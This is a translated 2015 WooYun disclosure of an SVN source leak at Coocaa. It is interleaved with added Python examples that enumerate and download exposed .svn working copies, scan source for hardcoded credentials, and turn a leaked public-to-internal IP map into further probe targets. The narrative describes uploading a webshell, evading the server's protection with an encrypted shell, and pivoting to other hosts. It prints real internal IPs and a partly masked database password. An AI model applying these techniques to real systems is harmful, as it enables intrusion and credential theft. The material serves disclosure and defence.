Vulnerability summary

Defect ID: wooyun-2015-096900

Title: GETSHELL on 酷开网络 (Coocaa) resulting from an SVN leak (intranet penetration possible)

Vendor: 深圳市酷开网络科技有限公司 (Shenzhen Coocaa Network Technology Co., Ltd.)

Author: er0tic

Submitted: 2015-02-12 09:08

Fixed: 2015-02-28 17:03

Published: 2015-02-28 17:03

Vulnerability type: improper system/service operations configuration

Severity: High

Self-assessed Rank: 12

Status: fixed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2015-02-12: Details sent to the vendor; awaiting vendor handling
2015-02-12: Vendor confirmed; details visible to the vendor only
2015-02-22: Details disclosed to core white hats and domain experts
2015-02-28: Vendor fixed the vulnerability and chose to disclose; details made public

Brief description:

Following the previous SVN leak, I did some further testing while going through the files.

Detailed description:

Following the previous SVN leak, I did some further testing while going through the files.
http://wooyun.org/bugs/wooyun-2015-096890
When I accessed the host directly by IP I landed in a different web root; I tried it, and the same SVN leak was present there too.

(screenshot: 1.jpg)
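How an exposed .svn directory like the one above is turned into a full download of the site, as an added example (this is not the reporter's tooling or the vendor's code): it parses the two index formats Subversion has used, the pre-1.7 plain-text .svn/entries and the 1.7+ SQLite wc.db, from constructed sample data, and maps each versioned file to the pristine copy the web server will serve. The base URL http://target.example/ and the sample contents are assumptions.

```python
"""Enumerate the files a web-served Subversion working copy exposes.

Two on-disk layouts exist:
  * SVN < 1.7: every directory has its own .svn/ with a plain-text
    .svn/entries index; pristine copies live in .svn/text-base/<name>.svn-base
  * SVN >= 1.7: one .svn/ at the working-copy root holding a SQLite wc.db;
    pristine copies live in .svn/pristine/<xx>/<sha1>.svn-base
Sample data below is constructed so the script runs offline.
"""
import sqlite3
from typing import List, Tuple

# Constructed pre-1.7 .svn/entries (format 10). Records are separated by a
# form feed; the first record (empty name) is the directory itself.
SAMPLE_ENTRIES = (
    "10\n"                        # entries-file format number
    "\ndir\n1234\n"               # record for the directory itself
    "\x0c\n"
    "index.php\nfile\n\n\n\n"     # file record, remaining fields omitted
    "\x0c\n"
    "inc\ndir\n"
    "\x0c\n"
    "dbhost.config.php\nfile\n"
    "\x0c\n"
)


def parse_entries(text: str) -> List[Tuple[str, str]]:
    """Return (name, kind) for every child node listed in a .svn/entries file."""
    nodes = []
    for record in text.split("\x0c")[1:]:      # [0] is the format number + self record
        lines = record.lstrip("\n").split("\n")
        if len(lines) >= 2 and lines[0] and lines[1] in ("file", "dir"):
            nodes.append((lines[0], lines[1]))
    return nodes


def text_base_path(name: str) -> str:
    """Pristine copy location in the pre-1.7 layout."""
    return f".svn/text-base/{name}.svn-base"


def download_plan(base_url: str, nodes: List[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """(local_path, url) pairs for the pre-1.7 layout.

    Files map to their text-base copy; directories map to their own
    .svn/entries, which is fetched next so enumeration recurses.
    """
    base = base_url.rstrip("/") + "/"
    plan = []
    for name, kind in nodes:
        if kind == "file":
            plan.append((name, base + text_base_path(name)))
        else:
            plan.append((name + "/.svn/entries", base + name + "/.svn/entries"))
    return plan


def pristine_path(checksum: str) -> str:
    """Map a wc.db NODES.checksum value ('$sha1$<hex>') to its pristine file."""
    if not checksum.startswith("$sha1$"):
        raise ValueError(f"unexpected checksum format: {checksum}")
    digest = checksum[len("$sha1$"):]
    return f".svn/pristine/{digest[:2]}/{digest}.svn-base"


def list_wcdb(conn: sqlite3.Connection) -> List[Tuple[str, str]]:
    """(relpath, pristine_path) for every file node in a 1.7+ wc.db."""
    rows = conn.execute(
        "SELECT local_relpath, checksum FROM NODES "
        "WHERE op_depth = 0 AND kind = 'file' AND checksum IS NOT NULL "
        "ORDER BY local_relpath"
    ).fetchall()
    return [(relpath, pristine_path(chk)) for relpath, chk in rows]


def build_sample_wcdb() -> sqlite3.Connection:
    """Constructed in-memory stand-in for .svn/wc.db (subset of the real NODES columns)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE NODES (wc_id INTEGER, local_relpath TEXT, op_depth INTEGER, "
        "parent_relpath TEXT, kind TEXT, checksum TEXT)"
    )
    conn.executemany("INSERT INTO NODES VALUES (1, ?, 0, ?, ?, ?)", [
        ("", None, "dir", None),
        ("index.php", "", "file", "$sha1$" + "a" * 40),
        ("inc", "", "dir", None),
        ("inc/define.php", "inc", "file", "$sha1$" + "b" * 40),
    ])
    conn.commit()
    return conn


if __name__ == "__main__":
    for local, url in download_plan("http://target.example", parse_entries(SAMPLE_ENTRIES)):
        print(f"{local:30s} <- {url}")
    for relpath, pristine in list_wcdb(build_sample_wcdb()):
        print(f"{relpath:30s} <- http://target.example/{pristine}")
```

Against a live host the two requests to make first are /.svn/entries and /.svn/wc.db. In the pre-1.7 layout every subdirectory carries its own .svn/entries, so enumeration recurses directory by directory; wc.db lists the whole working copy at once. On the defending side the fix is equally simple: deploy with `svn export` rather than a checkout, and deny every request path containing /.svn/ at the web server.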


I downloaded the whole site, went through the source and found an FTP account.

(screenshot: 2.jpg)


I connected to the FTP server and dropped a shell on it, but it seemed the server had some security protection installed: accessing the shell got me blacklisted.
I then uploaded an encrypted one and that did the trick.

ifconfig
eth0      Link encap:Ethernet  HWaddr 00:16:3E:0E:0E:5E
          inet addr:10.200.240.207  Bcast:10.200.247.255  Mask:255.255.248.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:51790160392 errors:0 dropped:0 overruns:0 frame:0
          TX packets:43523430171 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:9423741499158 (8.5 TiB)  TX bytes:4406883449774 (4.0 TiB)
          Interrupt:19
eth1      Link encap:Ethernet  HWaddr 00:16:3E:0E:0E:9D
          inet addr:42.121.104.85  Bcast:42.121.107.255  Mask:255.255.252.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:6857288612 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2632907083 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:860026620346 (800.9 GiB)  TX bytes:5608579939760 (5.1 TiB)
          Interrupt:20
lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:169135098844 errors:0 dropped:0 overruns:0 frame:0
          TX packets:169135098844 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:59052893992764 (53.7 TiB)  TX bytes:59052893992764 (53.7 TiB)


define.php
<?php
require_once '../webservices/settings.php';
define("SRTLocalDBUser", "cloudtv");
//define("SRTLocalDBPassword", "abc.123");
define("SRTLocalDBPassword", "cl*****#");
define("SRTAITVDBHOST","10.200.240.208");
//Exception
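The define.php above is the kind of find that turns a source leak into credentials. An added example, not part of the report: a small scanner run over a constructed source tree modelled on that file (placeholder values, not the real password) which flags define() constants holding passwords or internal hosts, shell variable assignments and credentials embedded in URLs, and reports commented-out lines as well, since the old password in the //define(...) line is just as readable in leaked source as the live one. The file names and the upload script are assumptions.

```python
import re
from typing import Dict, List, Tuple

# Constructed source tree modelled on the leaked define.php; the password
# strings are placeholders, not the real values.
SAMPLE_SOURCES: Dict[str, str] = {
    "webservices/define.php": (
        "<?php\n"
        "require_once '../webservices/settings.php';\n"
        'define("SRTLocalDBUser", "cloudtv");\n'
        '//define("SRTLocalDBPassword", "old-placeholder");\n'
        'define("SRTLocalDBPassword", "current-placeholder");\n'
        'define("SRTAITVDBHOST","10.200.240.208");\n'
    ),
    "tools/upload.sh": (
        "#!/bin/sh\n"
        "ftp_user=deploy\n"
        "ftp_pass=placeholder123\n"
        "curl -T build.apk ftp://$ftp_user:$ftp_pass@10.0.0.5/apk/\n"
    ),
    "README.md": "Nothing secret here.\n",
}

PRIVATE_IP = r"(?:10|172\.(?:1[6-9]|2\d|3[01])|192\.168)\.[0-9.]+"

# (label, regex). Group 1 names what leaked, group 2 holds the value.
RULES: List[Tuple[str, re.Pattern]] = [
    ("php-define-credential", re.compile(
        r'define\(\s*["\']([^"\']*(?:pass|pwd|secret|token|key)[^"\']*)["\']'
        r'\s*,\s*["\']([^"\']+)["\']', re.I)),
    ("php-define-internal-host", re.compile(
        r'define\(\s*["\']([^"\']*host[^"\']*)["\']\s*,\s*["\'](' + PRIVATE_IP + r')["\']', re.I)),
    ("shell-assignment-credential", re.compile(
        r'^\s*(\w*(?:pass|pwd|secret|token)\w*)=([^\s#]+)', re.I)),
    ("url-embedded-credential", re.compile(
        r'\b((?:ftp|https?|mysql)://[^/\s:@]+):([^/\s@]+)@', re.I)),
]

Finding = Tuple[str, int, str, str, bool]   # path, line, rule, identifier, commented_out


def scan_source(path: str, text: str) -> List[Finding]:
    """Run every rule over each line; report commented-out hits as well.

    A leading // hides the value from the running application, not from
    anyone reading the leaked source, so the old password stays a finding.
    """
    findings: List[Finding] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        commented = line.lstrip().startswith(("//", "#", "/*", "*"))
        for label, rx in RULES:
            m = rx.search(line)
            if m:
                findings.append((path, line_no, label, m.group(1), commented))
    return findings


def scan_tree(sources: Dict[str, str]) -> List[Finding]:
    """Scan a {path: contents} mapping, e.g. a downloaded working copy."""
    out: List[Finding] = []
    for path, text in sources.items():
        out.extend(scan_source(path, text))
    return out


if __name__ == "__main__":
    for path, line_no, rule, ident, commented in scan_tree(SAMPLE_SOURCES):
        flag = " (commented out)" if commented else ""
        print(f"{path}:{line_no}: {rule}: {ident}{flag}")
```

The same rules run just as well over a repository before it is committed as over a leaked tree after the fact; the finding list is the inventory of credentials that must be rotated, which is what the vendor's fix note at the bottom of this page describes.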


Then I found this file:

dbhost.config.php
<?php
return array(
"42.121.104.89"=>"10.135.9.151",
"42.121.104.90"=>"10.135.9.151",
"42.121.104.92"=>"10.135.9.150",
"42.121.104.93"=>"10.135.9.150",
"42.121.104.94"=>"10.135.9.149",
"42.121.104.95"=>"10.135.9.149",
"42.121.104.96"=>"10.135.9.240",
"42.121.119.9"=>"10.135.9.240",
"42.121.119.92"=>"10.135.9.147",
// "42.121.119.94"=>"10.135.9.147",
// "42.121.113.124"=>"10.132.58.84",
"42.121.113.125"=>"10.132.58.84",
// "42.121.113.128"=>"10.132.58.88",
// "42.121.113.13"=>"10.132.58.85",
"42.121.59.208"=>"10.132.58.86",
"42.121.59.209"=>"10.132.58.86",
"42.121.59.211"=>"10.132.58.85",
"42.121.59.212"=>"10.132.58.88",
// "42.121.59.213"=>"10.200.240.22",
// "42.121.59.215"=>"10.200.240.22",
"42.121.59.216"=>"10.200.240.224",//"10.200.240.209",
"42.121.59.217"=>"10.200.240.209",
"42.121.59.218"=>"10.200.240.219",
"42.121.59.214"=>"10.200.25.168",//ep
"42.121.104.91"=>"10.200.25.168",//ep
"42.121.119.90"=>"10.200.25.168",//ep
"42.121.119.91"=>"10.200.25.168",//ep
);
// return array(
// "42.121.104.89"=>"10.132.58.9",
// "42.121.104.90"=>"10.132.58.9",
// "42.121.104.92"=>"10.132.58.87",
// "42.121.104.94"=>"10.132.58.87"
// );


So this is a mapping of public IPs to internal IPs?
I tried a few of them and they have the same SVN leak. This is asking for trouble.
Please remove the shells yourselves; they are in the APK and RS directories.
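The dbhost.config.php mapping is what turned one leaked host into a list of further targets. An added example, not from the report: parsing that file shape (placeholder addresses, not the ones above) into the active public-to-internal map, recovering the backends that survive only in comments, and grouping public IPs by shared backend so each distinct backend is checked once for the same .svn exposure.

```python
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed excerpt in the shape of the leaked dbhost.config.php. Addresses are
# documentation/private ranges (RFC 5737 / RFC 1918), not the report's.
SAMPLE_CONFIG = '''<?php
return array(
"203.0.113.10"=>"10.135.9.151",
"203.0.113.11"=>"10.135.9.151",
// "203.0.113.12"=>"10.135.9.147",
"203.0.113.13"=>"10.200.240.224",//"10.200.240.209",
"203.0.113.14"=>"10.200.25.168",//ep
);
// return array(
// "203.0.113.10"=>"10.132.58.9",
// );
'''

IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"
PAIR = re.compile(rf'"({IPV4})"\s*=>\s*"({IPV4})"')
BARE = re.compile(rf'"({IPV4})"')


def parse_mapping(text: str) -> Tuple[Dict[str, str], Dict[str, str]]:
    """Split the PHP array into two maps, public IP -> internal IP.

    active: pairs the interpreter actually returns.
    stale:  backends that survive only in comments, either a whole //-line or
            a trailing //"x.x.x.x" after a live pair. PHP ignores them; an
            attacker reading the source does not.
    """
    active: Dict[str, str] = {}
    stale: Dict[str, str] = {}
    for line in text.splitlines():
        code, _, comment = line.partition("//")
        live = PAIR.search(code)
        if live:
            active[live.group(1)] = live.group(2)
            prev = BARE.search(comment)      # e.g. //"10.200.240.209"
            if prev:
                stale[live.group(1)] = prev.group(1)
            continue
        dead = PAIR.search(comment)          # the whole pair is commented out
        if dead:
            stale[dead.group(1)] = dead.group(2)
    return active, stale


def by_backend(active: Dict[str, str]) -> Dict[str, List[str]]:
    """Group public IPs by the internal host they front."""
    groups: Dict[str, List[str]] = defaultdict(list)
    for public, internal in active.items():
        groups[internal].append(public)
    return {k: sorted(v) for k, v in groups.items()}


def check_targets(active: Dict[str, str], stale: Dict[str, str]) -> List[str]:
    """Every public IP the file ever referenced, deduplicated, for the .svn probe."""
    return sorted(set(active) | set(stale))


if __name__ == "__main__":
    act, old = parse_mapping(SAMPLE_CONFIG)
    for internal, publics in sorted(by_backend(act).items()):
        print(f"{internal:16s} <- {', '.join(publics)}")
    print("stale:", old)
    print("probe:", check_targets(act, old))
```

Two public IPs fronting the same internal host are almost certainly the same deployment, so one confirmed leak there implies the other; the commented-out entries are worth keeping on the list because a decommissioned mapping in the config does not mean the host itself was decommissioned.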

Proof of vulnerability:

(Identical to the detailed description above.)

Suggested fix:

Better put in some overtime.

Copyright notice: please credit er0tic@乌云 (WooYun) when reposting.


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2015-02-12 10:07

Vendor reply:

Verified; the relevant staff have been contacted to fix it.

Latest status:

2015-02-28: Fix completed: the environment in question was reconfigured, external network access was closed, and the relevant account credentials were removed or changed.